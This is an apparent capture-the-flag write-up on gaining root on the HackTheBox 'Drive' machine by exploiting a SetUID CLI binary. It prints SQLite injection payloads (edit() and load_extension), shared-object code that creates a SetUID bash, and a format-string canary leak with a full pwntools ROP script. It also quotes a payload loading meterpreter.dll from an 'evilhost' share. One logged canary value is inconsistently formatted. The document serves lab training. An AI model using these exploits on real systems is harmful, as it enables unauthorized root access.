doodleGrive-cli: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=8c72c265a73f390aa00e69fc06d96f5576d29284, for GNU/Linux 3.2.0, not stripped
Running strings
on the binary shows a few clues. The program uses SQLite and the database in the web directory:
oxdf@hacky$ strings doodleGrive-cli
...[snip]...
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,last_login,is_superuser,username,email,is_staff,is_active,date_joined FROM accounts_customuser;'
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,name FROM accounts_g;'
/usr/bin/sudo -u www-data /opt/server-health-check.sh
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'UPDATE accounts_customuser SET is_active=1 WHERE username="%s";'
...[snip]...
There’s a menu:
...[snip]...
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
exiting...
please Select a valid option...
...[snip]...
There are strings about logging in:
...[snip]...
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
Enter password for
moriarty
findMeIfY0uC@nMr.Holmz!
Welcome...!
Invalid username or password.
...[snip]...
With just this, I can guess the username of moriarty and password “findMeIfY0uC@nMr.Holmz!” (which does work).
I’ll open it in Ghidra and once it finishes analysis, go to main
. After a bit of renaming / retyping, it looks like:
int main(void)
{
int res;
long in_FS_OFFSET;
char entered_username [16];
char entered_password [56];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
setenv("PATH","",1);
setuid(0);
setgid(0);
puts(
"[!]Caution this tool still in the development phase...please report any issue to the developm ent team[!]"
);
puts("Enter Username:");
fgets(entered_username,0x10,(FILE *)stdin);
sanitize_string(entered_username);
printf("Enter password for ");
printf(entered_username,0x10);
puts(":");
fgets(entered_password,400,(FILE *)stdin);
sanitize_string(entered_password);
res = strcmp(entered_username,"moriarty");
if (res == 0) {
res = strcmp(entered_password,"findMeIfY0uC@nMr.Holmz!");
if (res == 0) {
puts("Welcome...!");
main_menu();
goto LAB_0040231e;
}
}
puts("Invalid username or password.");
LAB_0040231e:
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
The username and password are static checks for “moriarty” and “findMeIfY0uC@nMr.Holmz!”, just as I predicted when looking at strings.
This function looks a bit complex, but it is just looping through the string and removing any characters that match a given deny list:
void sanitize_string(char *string)
{
size_t sVar1;
long in_FS_OFFSET;
int ptr;
int i;
uint j;
undefined8 local_29;
undefined local_21;
long canary;
bool bad_char;
canary = *(long *)(in_FS_OFFSET + 0x28);
ptr = 0;
local_29 = 0x5c7b2f7c20270a00;
local_21 = 0x3b;
i = 0;
do {
sVar1 = strlen(string);
if (sVar1 <= (ulong)(long)i) {
string[ptr] = '\0';
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
bad_char = false;
for (j = 0; j < 9; j = j + 1) {
if (string[i] == *(char *)((long)&local_29 + (long)(int)j)) {
bad_char = true;
break;
}
}
if (!bad_char) {
string[ptr] = string[i];
ptr = ptr + 1;
}
i = i + 1;
} while( true );
}
The bad characters are, in hex, “5c7b2f7c20270a003b”, which decodes to `\`, `{`, `/`, `|`, space, `'`, `\n`, `\x00`, and `;`. This is a bit of an odd list, but it will prevent some attacks such as SQL injection.
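To double-check that decode, a short Python sketch (my own reimplementation, not code from the binary) mirrors the loop, treating `local_29` as the little-endian stack bytes with `local_21` as the ninth byte:

```python
# Sketch of sanitize_string's deny list: local_29 = 0x5c7b2f7c20270a00 is
# stored little-endian on the stack, and local_21 = 0x3b (';') is byte nine.
deny = (0x5c7b2f7c20270a00).to_bytes(8, "little") + bytes([0x3b])
print(deny)  # b"\x00\n' |/{\\;"

def sanitize(s: bytes) -> bytes:
    # mirror of the decompiled loop: drop any byte on the deny list
    return bytes(c for c in s if c not in deny)

print(sanitize(b"a'b; c/d"))  # b'abcd'
```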
This function offers the menu, parses the input, and calls the matching function:
void main_menu(void)
{
long in_FS_OFFSET;
char user_input [24];
undefined8 canary;
canary = *(undefined8 *)(in_FS_OFFSET + 0x28);
fflush((FILE *)stdin);
do {
putchar(10);
puts("doodleGrive cli beta-2.2: ");
puts("1. Show users list and info");
puts("2. Show groups list");
puts("3. Check server health and status");
puts("4. Show server requests log (last 1000 request)");
puts("5. activate user account");
puts("6. Exit");
printf("Select option: ");
fgets(user_input,10,(FILE *)stdin);
switch(user_input[0]) {
case '1':
show_users_list();
break;
case '2':
show_groups_list();
break;
case '3':
show_server_status();
break;
case '4':
show_server_log();
break;
case '5':
activate_user_account();
break;
case '6':
puts("exiting...");
/* WARNING: Subroutine does not return */
exit(0);
default:
puts("please Select a valid option...");
}
} while( true );
}
It only checks the first byte of input for ASCII 1-6, and option 6 just exits.
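The dispatch can be modeled in a few lines of Python (a sketch of the decompiled switch, not the binary's code), showing that anything after the first byte is ignored:

```python
# Model of main_menu's switch: only user_input[0] is examined,
# so "5 whatever" still selects option 5.
def dispatch(line: str) -> str:
    handlers = {"1": "show_users_list", "2": "show_groups_list",
                "3": "show_server_status", "4": "show_server_log",
                "5": "activate_user_account", "6": "exit"}
    return handlers.get(line[:1], "invalid")

print(dispatch("5junk\n"))  # activate_user_account
```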
Each of the menu options calls a function that invokes system
and the output will be shown to the screen. For example, show_users_list
:
void show_users_list(void)
{
long in_FS_OFFSET;
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
system(
"/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'SELECT id,last_login,is_superuser, username,email,is_staff,is_active,date_joined FROM accounts_customuser;\'"
);
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
In this case, it runs a SQLite query. The others each call system with a different command:
| Option | Function | Command |
|---|---|---|
| 1 | show_users_list | `/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,last_login,is_superuser, username,email,is_staff,is_active,date_joined FROM accounts_customuser;'` |
| 2 | show_groups_list | `/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,name FROM accounts_g;'` |
| 3 | show_server_status | `/usr/bin/sudo -u www-data /opt/server-health-check.sh` |
| 4 | show_server_log | `/usr/bin/sudo -u www-data /usr/bin/tail -1000 /var/log/nginx/access.log` |
Each of these runs without user input, so there’s not much I can do to mess with them.
Option 5, activate_user_account
, is similar to the others, but it takes user input:
void activate_user_account(void)
{
size_t first_newline_offset;
long in_FS_OFFSET;
char username_input [48];
char cmd_str [264];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
printf("Enter username to activate account: ");
fgets(username_input,0x28,(FILE *)stdin);
first_newline_offset = strcspn(username_input,"\n");
username_input[first_newline_offset] = '\0';
if (username_input[0] == '\0') {
puts("Error: Username cannot be empty.");
}
else {
sanitize_string(username_input);
snprintf(cmd_str,0xfa,
"/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";\'"
,username_input);
printf("Activating account for user \'%s\'...\n",username_input);
system(cmd_str);
}
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
It updates the is_active
value for a user to 1.
There are multiple vulnerabilities in this binary that can lead to a root shell:
flowchart TD;
A[SetUID doodleGrive-cli]-->B(SQL Injection);
B-->C(edit RCE);
C-->D[root Shell];
B-->G(load_extension RCE);
G-->D;
A-->E(Format String\nLeak Canary);
E-->F(BOF / ROP);
F-->D;
subgraph identifier[" "]
direction LR
start1[ ] --->|intended| stop1[ ]
style start1 height:0px;
style stop1 height:0px;
start2[ ] --->|unintended| stop2[ ]
style start2 height:0px;
style stop2 height:0px;
end
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 0,1,2,3,4,9 stroke-width:2px,stroke:#4B9CD3,fill:none;
style identifier fill:#1d1d1d,color:#FFFFFFFF;
This method involves abusing the edit
SQL function, which allows an interactive user to specify an editor program that SQLite will invoke on each column value as it is used.
If the second argument is omitted, the VISUAL environment variable is used.
So if I can set this environment variable, it will call a program for me.
Locally I can try this on the db.sqlite3
file on my local system:
oxdf@hacky$ VISUAL=cat sqlite3 db.sqlite3 'select "1" from accounts_customuser where username=""&edit(username)';
admincrisDiseljamesMasonmartinCruztomHands
By setting VISUAL
to cat
, it calls cat
on each column one by one as part of the query.
The filter barely gets in the way here: the space and `;` in my payload will be stripped, but none of the characters I actually need (`"`, `&`, and the parentheses) are on the deny list, and the `--` still comments out the trailing quote.
I’ll start the CLI and authenticate:
tom@drive:~$ VISUAL=/usr/bin/vim ./doodleGrive-cli
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
moriarty
Enter password for moriarty:
findMeIfY0uC@nMr.Holmz!
Welcome...!
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
I’ll select option 5, and give it my injection:
Select option: 5
Enter username to activate account: "&edit(username);-- -
When I hit enter, it opens vim
with the text “admin”. I’ll enter :!/bin/bash
to execute bash
from within vim
, and it drops to a root shell:
Select option: 5
Enter username to activate account: "&edit(username);-- -
Activating account for user '"&edit(username)---'...
bash: groups: No such file or directory
bash: lesspipe: No such file or directory
bash: dircolors: No such file or directory
root@drive:~#
This shell has no PATH, so I can either set it, or run everything with full path:
root@drive:/root# /bin/ls
root.txt
root@drive:/root# /bin/cat root.txt
641e7a5b************************
The activate_user_account
function asks for input which is used to build a command string. If I can bypass the filter function, then I can inject into that SQLite call. The PayloadsAllTheThings page on SQLite shows this POC for getting RCE via SQLite:
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
It’s loading a DLL from a file share to run on a Windows host. Still, this is enough to get me looking at the load_extension
function, which seems to load a shared object file and call sqlite3_extension_init
.
First I want to get a payload that will run. I’ll create a very simple POC program in C:
#include <stdlib.h>
void sqlite3_extension_init() {
system("id");
}
I’ll compile that into a shared object:
oxdf@hacky$ gcc -shared -fPIC poc.c -o poc.so
oxdf@hacky$ file poc.so
poc.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=1d5a4c0bc52b6a08141a4c04150203fbfc155bdf, not stripped
Now I’ll run sqlite3
and try to get it loaded. To run commands from the command line, I’ll need to give it a DB to open, but it doesn’t have to actually exist if I’m not querying any tables:
oxdf@hacky$ sqlite3 does_not_exist.sql "select 1";
1
The same way, I can call load_extension
:
oxdf@hacky$ sqlite3 does_not_exist.sql "select load_extension('./poc')";
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
The fact that I see id
output shows it ran my extension.
The program runs the following:
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";\'
It is putting my input in double quote marks. So to inject out of that, I need to send something like:
",load_extension('./poc');-- -
That would make the SQL:
UPDATE accounts_customuser SET is_active=1 WHERE username="",load_extension('./poc');-- -"
On my machine, I’ll try that:
oxdf@hacky$ sqlite3 does_not_exist.sql 'select "1",load_extension("./poc");-- -aaaaasdasda';
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
1|
This is actually cool because it’s showing how the extension is loaded, and it returns nothing, which becomes the empty column in the output. The junk after the -- -
is just to make sure the comment works.
For this to work, I need to use the /
character, which is banned. I don’t have a good way to reference my shared library without it. However, load_extension
takes a string. In the above example I hardcode it, but there’s no reason that string can’t be the output of a function. For example, char
(docs). “./poc” as a list of ints is 46, 47, 112, 111, 99. So I can do:
oxdf@hacky$ sqlite3 does_not_exist.sql 'select "1",load_extension(char(46,47,112,111,99));-- -aaaaasdasda';
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
1|
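A tiny helper (my own, hypothetical) generates the char() form for any path, which is handy if the extension ends up somewhere else:

```python
# Build a SQLite char(...) expression for a path so that banned
# characters like '/' never appear literally in the injected payload.
def char_expr(path: str) -> str:
    return "char({})".format(",".join(str(ord(c)) for c in path))

print(char_expr("./poc"))  # char(46,47,112,111,99)
```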
Putting that all together, I’ll generate a SO to run on Drive:
#include <stdlib.h>
void sqlite3_extension_init() {
system("/bin/id");
}
It’s important to give the full path, as the binary drops the PATH
variable. I’ll compile it:
tom@drive:/dev/shm$ gcc -shared poc.c -o p.so -fPIC
tom@drive:/dev/shm$ file p.so
p.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=703f07b9524db0445fbabc08c598856232039ce2, not stripped
I have to make this short. The input user name is limited to 0x28 = 40 characters:
printf("Enter username to activate account: ");
fgets(username_input,0x28,(FILE *)stdin);
To do "+load_extension(char(46,47,112,111,99));-- -
is 45 characters, too long. If I name my extension p.so
, then char(46,47,112) is just “./p” (SQLite appends the platform’s shared-library suffix when loading), and "+load_extension(char(46,47,112));-- -
works at 38 characters.
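A quick sanity check (a sketch) confirms both lengths against the buffer limit; fgets(buf, 0x28, stdin) keeps at most 0x27 = 39 characters plus the terminating NUL:

```python
# Length budget for the injection: the username read is
# fgets(username_input, 0x28, stdin), i.e. at most 39 usable characters.
long_payload = '"+load_extension(char(46,47,112,111,99));-- -'   # loads ./poc
short_payload = '"+load_extension(char(46,47,112));-- -'         # loads ./p
print(len(long_payload), len(short_payload))  # 45 38
```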
Now from /dev/shm
(so that ./p.so
works), I’ll run doodleGrive-cli
. After authenticating, I’ll select 5 and give the injection:
Select option: 5
Enter username to activate account: "+load_extension(char(46,47,112));-- -
Activating account for user '"+load_extension(char(46,47,112))---'...
uid=0(root) gid=0(root) groups=0(root),1003(tom)
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
It ran id
!
I’ll update my poc.c
to make a copy of bash
and set it as SetUID/SetGID (I like this better than just changing /bin/bash
, so as not to accidentally spoil it for other players).
#include <stdlib.h>
void sqlite3_extension_init() {
system("/bin/cp /bin/bash /tmp/0xdf");
system("/bin/chmod 6777 /tmp/0xdf");
}
I’ll compile that over p.so
and run the exploit again. Now there’s a SetUID/SetGID binary at /tmp/0xdf
:
tom@drive:/dev/shm$ ls -l /tmp/0xdf
-rwsrwsrwx 1 root root 1183448 Feb 14 22:25 /tmp/0xdf
Running with -p
(to not drop privs) gives a root shell and the flag:
tom@drive:/dev/shm$ /tmp/0xdf -p
0xdf-5.0# id
uid=1003(tom) gid=1003(tom) euid=0(root) egid=0(root) groups=0(root),1003(tom)
0xdf-5.0# cat /root/root.txt
641e7a5b************************
There’s nothing here I haven’t shown many times before, but I’ll give a quick walkthrough as it is the intended way.
In main
, there’s a format string vuln, where the user input name is printed as the first argument to printf
:
printf("Enter password for ");
printf(entered_username,0x10);
That printf
call takes place at 0x40229c. The stack canary is set at 0x402202. I’ll break at both of those in gdb
:
gdb-peda$ b *0x402202
Breakpoint 1 at 0x402202
gdb-peda$ b *0x40229c
Breakpoint 2 at 0x40229c
I’ll run to the first break, and then step to see the canary get set in RAX and then pushed to the stack. In this run, it’s set as:
RAX: 0xa70f7a4603600e00
I’ll run to the next break, putting in whatever as a username. When it gets there, I’ll look at the stack:
gdb-peda$ x/16g $rsp
0x7fffffffda80: 0x0000786c24353125 0x0000000000000002
0x7fffffffda90: 0x00000000004c00e0 0x000000000040339c
0x7fffffffdaa0: 0x00007fffffffdc08 0x0000000000400518
0x7fffffffdab0: 0x0000000000403320 0x00000000004033c0
0x7fffffffdac0: 0x0000000000000000 0xa70f7a4603600e00
0x7fffffffdad0: 0x0000000000403320 0x0000000000402b50
0x7fffffffdae0: 0x0000000000000000 0x0000000100000000
0x7fffffffdaf0: 0x00007fffffffdc08 0x00000000004021ed
The space for input is small, but I can read the i-th word on the stack with %i$lx
, where i
is a number.
I’ll use a simple Bash loop to try different offsets:
oxdf@hacky$ for i in $(seq 1 30); do echo -n "$i: "; echo "%${i}"'$lx' | ./doodleGrive-cli | grep "Enter password for" | cut -d' ' -f4; done
1: 10:
2: 0:
3: 0:
4: 7ffc322aa7b0:
5: 13:
6: 786c243625:
7: 2:
8: 4c00e0:
9: 40339c:
10: 7ffe4d8f3f48:
11: 400518:
12: 403320:
13: 4033c0:
14: 0:
15: 7e298c924cb0a00:
16: 403320:
17: 402b50:
18: 0:
19: 100000000:
20: 7fff573f1318:
21: 4021ed:
22: 0:
23: 1900000000:
24: 21:
25: 2000000000:
26: 0:
27: 0:
28: 0:
29: 0:
30: 0:
15 looks like the best candidate to be the canary. If I run the loop a couple more times, most of the values stay basically the same, but 15 is completely random. That’s the canary.
The output looks like this:
oxdf@hacky$ ./doodleGrive-cli
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
%15$lx
Enter password for ae1d5d1e957b4200:
Next I’ll get the offset of the overflow to overwrite RIP. The entered_password
buffer is 56 bytes long, but fgets unsafely reads up to 400 bytes into it:
fgets(entered_password,400,(FILE *)stdin);
I’ll create a pattern:
oxdf@hacky$ pattern_create -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
I’ll set a break point at the place where the canary is checked:
gdb-peda$ disassemble main
...[snip]...
0x0000000000402323 <+310>: mov rcx,QWORD PTR [rbp-0x8]
0x0000000000402327 <+314>: xor rcx,QWORD PTR fs:0x28
0x0000000000402330 <+323>: je 0x402337 <main+330>
0x0000000000402332 <+325>: call 0x456d30 <__stack_chk_fail_local>
0x0000000000402337 <+330>: leave
0x0000000000402338 <+331>: ret
gdb-peda$ b *main+314
Breakpoint 1 at 0x402327
I’ll run, entering whatever for the username and the pattern for the password. When it hits the break point, I can see it’s just loaded the canary off the stack into RCX:
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x400518 --> 0x0
RCX: 0x4130634139624138 ('8Ab9Ac0A')
RDX: 0x0
RSI: 0x4c8bd0 ("Invalid username or password.\nthe development phase...please report any issue to the development team[!]\n")
RDI: 0x4c5ea0 --> 0x0
RBP: 0x7fffffffdad0 ("c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
RSP: 0x7fffffffda80 --> 0x66647830 ('0xdf')
RIP: 0x402327 (<main+314>: xor rcx,QWORD PTR fs:0x28)
R8 : 0x1e
R9 : 0x0
R10: 0x7fffffffda80 --> 0x66647830 ('0xdf')
R11: 0x246
R12: 0x4033c0 (<__libc_csu_fini>: endbr64)
R13: 0x0
R14: 0x4c3018 --> 0x448810 (<__strcpy_avx2>: endbr64)
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x402319 <main+300>: call 0x419ca0 <puts>
0x40231e <main+305>: mov eax,0x0
0x402323 <main+310>: mov rcx,QWORD PTR [rbp-0x8]
=> 0x402327 <main+314>: xor rcx,QWORD PTR fs:0x28
0x402330 <main+323>: je 0x402337 <main+330>
0x402332 <main+325>: call 0x456d30 <__stack_chk_fail_local>
0x402337 <main+330>: leave
0x402338 <main+331>: ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda80 --> 0x66647830 ('0xdf')
0008| 0x7fffffffda88 --> 0x2
0016| 0x7fffffffda90 ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0024| 0x7fffffffda98 ("2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0032| 0x7fffffffdaa0 ("a5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0040| 0x7fffffffdaa8 ("Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0048| 0x7fffffffdab0 ("0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
0056| 0x7fffffffdab8 ("b3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0000000000402327 in main ()
This value is the part of the pattern that ended up as the canary. pattern_offset
will show how far into the pattern that is:
oxdf@hacky$ pattern_offset -q 4130634139624138
[*] Exact match at offset 56
So I want 56 bytes of padding, then the leaked canary, then eight bytes for the saved RBP, and then the return address.
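For reference, the two pattern tools can be sketched in a few lines of Python (a simplified model, not the actual implementation): the pattern is every (uppercase, lowercase, digit) triple in order, so any eight-byte window is unique and maps back to exactly one offset.

```python
import itertools
import string

# Simplified model of pattern_create: concatenate every (Upper, lower,
# digit) triple in order, then truncate to the requested length.
def pattern_create(n: int) -> str:
    gen = ("".join(t) for t in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    return "".join(itertools.islice(gen, (n + 2) // 3))[:n]

pat = pattern_create(200)
# RCX held 0x4130634139624138; as little-endian bytes that's "8Ab9Ac0A".
chunk = bytes.fromhex("4130634139624138")[::-1].decode()
print(chunk, pat.find(chunk))  # 8Ab9Ac0A 56
```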
My strategy is going to be to call system("/bin/sh")
. I’ll need a /bin/sh
string to pass to system
. I can’t send it myself, as /
is a banned character. But it exists in the binary:
oxdf@hacky$ strings -a -t x doodleGrive-cli | grep bin/sh
97cd5 /bin/sh
Because the binary has PIE disabled, this should be at the same place every time:
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
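That also explains where the address 0x497cd5 used in the script below comes from: strings -t x reports the file offset, and for this no-PIE binary the load base plus that offset gives the runtime address (assuming the usual one-to-one segment mapping, which holds here):

```python
# Mapping the strings(1) file offset to a runtime address for a no-PIE
# binary (assumes the typical base + offset segment mapping):
file_offset = 0x97cd5    # from: strings -a -t x doodleGrive-cli | grep bin/sh
load_base = 0x400000     # default load address for no-PIE x86-64 ELF
print(hex(load_base + file_offset))  # 0x497cd5
```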
I’ll also need the address of system
(and exit
if I want to be clean), and those are easily found with pwntools
in Python by loading the binary (elf = ELF("./doodleGrive-cli")
) and then referencing the addresses (elf.sym.system
and elf.sym.exit
).
Finally, I need two gadgets. In 64-bit, the first argument to system
will be the string at the address in RDI. So I need a pop rdi; ret
gadget. I’ll also need a plain ret
gadget for stack alignment.
Ropper is a nice tool for this:
oxdf@hacky$ ropper -f ./doodleGrive-cli --search "pop rdi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi
[INFO] File: ./doodleGrive-cli
0x000000000044734d: pop rdi; add eax, dword ptr [rax]; add byte ptr [rax - 0x7d], cl; ret 0x4910;
0x00000000004569a0: pop rdi; call rax;
0x00000000004569a0: pop rdi; call rax; mov rdi, rax; mov eax, 0x3c; syscall;
0x00000000004675cd: pop rdi; idiv esi; jmp qword ptr [rsi + 0x2e];
0x0000000000436eb9: pop rdi; in al, dx; mov qword ptr [rdi - 0xc], rcx; mov dword ptr [rdi - 4], edx; ret;
0x0000000000436cc9: pop rdi; in eax, dx; mov qword ptr [rdi - 0xb], rcx; mov dword ptr [rdi - 4], edx; ret;
0x000000000042831d: pop rdi; jmp rax;
0x000000000041935f: pop rdi; or byte ptr [rbx - 0x76fefbb9], al; ret 0xe281;
0x0000000000410a40: pop rdi; or eax, dword ptr [rax]; syscall;
0x0000000000436ae9: pop rdi; out dx, al; mov qword ptr [rdi - 0xa], rcx; mov dword ptr [rdi - 4], edx; ret;
0x0000000000436919: pop rdi; out dx, eax; mov qword ptr [rdi - 9], r8; mov dword ptr [rdi - 4], edx; ret;
0x0000000000436a15: pop rdi; out dx, eax; mov qword ptr [rdi - 9], rcx; mov byte ptr [rdi - 1], dl; ret;
0x0000000000436961: pop rdi; out dx, eax; mov qword ptr [rdi - 9], rcx; mov dword ptr [rdi - 4], edx; ret;
0x0000000000403a4b: pop rdi; pop rbp; ret;
0x0000000000401912: pop rdi; ret;
The last one looks perfect. And 0x401913 (one byte after) is just ret
.
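This works because of how the gadget assembles (a quick sketch): pop rdi; ret is the two bytes 5f c3, so jumping one byte into the gadget lands on a bare ret.

```python
# `pop rdi; ret` assembles to 5f c3, so the address one byte past the
# gadget's start points at a lone c3 (ret).
gadget = bytes.fromhex("5fc3")   # pop rdi; ret
pop_rdi = 0x401912
ret = pop_rdi + 1                # skip the 5f byte, land on c3
print(hex(ret), gadget[1:])  # 0x401913 b'\xc3'
```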
I’ll generate the following script:
from pwn import *
elf = ELF("./doodleGrive-cli")
# addresses
pop_rdi = p64(0x401912) # ropper -f ./doodleGrive-cli --search "pop rdi"
ret = p64(0x401913) # just return from previous
bin_sh = p64(0x497cd5) # strings -a -t x doodleGrive-cli | grep bin/sh
if args.SSH:
ssh = ssh(host="drive.htb", user="tom", password="johnmayer7")
p = ssh.process("/home/tom/doodleGrive-cli")
prompt = ""
else:
p = elf.process()
prompt = "$ "
#gdb.attach(p, """break *0x40229c\nc\n""")
# format string vuln to leak canary
p.readuntil(b"Enter Username:\n")
p.sendline(b"%15$lx")
p.readuntil(b"Enter password for ")
leak = p.readuntil(b":\n").strip(b"\n:")
canary = int(leak, 16)
info(f"Leak canary: {canary:#x}")
# build payload to ROP system("/bin/sh")
payload = b"A" * 56 # offset to canary
payload += p64(canary) # leaked canary
payload += b"A" * 8 # junk for saved RBP
payload += ret # ret for stack alignment
payload += pop_rdi # go to pop rdi gadget
payload += bin_sh # address of "/bin/sh" to pop into RDI
payload += p64(elf.sym.system) # return to system
payload += p64(elf.sym.exit) # return to exit
p.sendline(payload)
# clear message
p.readuntil(b"Invalid username or password.")
# reset path cleared by binary
p.sendline(b"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")
p.interactive(prompt=prompt)
Running this locally gives a shell:
oxdf@hacky$ python sploit.py
[*] '/media/sf_CTFs/hackthebox/drive-10.10.11.235/doodleGrive-cli'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/media/sf_CTFs/hackthebox/drive-10.10.11.235/doodleGrive-cli': pid 778049
[*] Leak canary: 0x16285182807784140032
[*] Switching to interactive mode
$ id
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
If I give it the SSH
argument, it works remotely:
oxdf@hacky$ python sploit.py SSH
[*] '/media/sf_CTFs/hackthebox/drive-10.10.11.235/doodleGrive-cli'
Arch: amd64-64-little
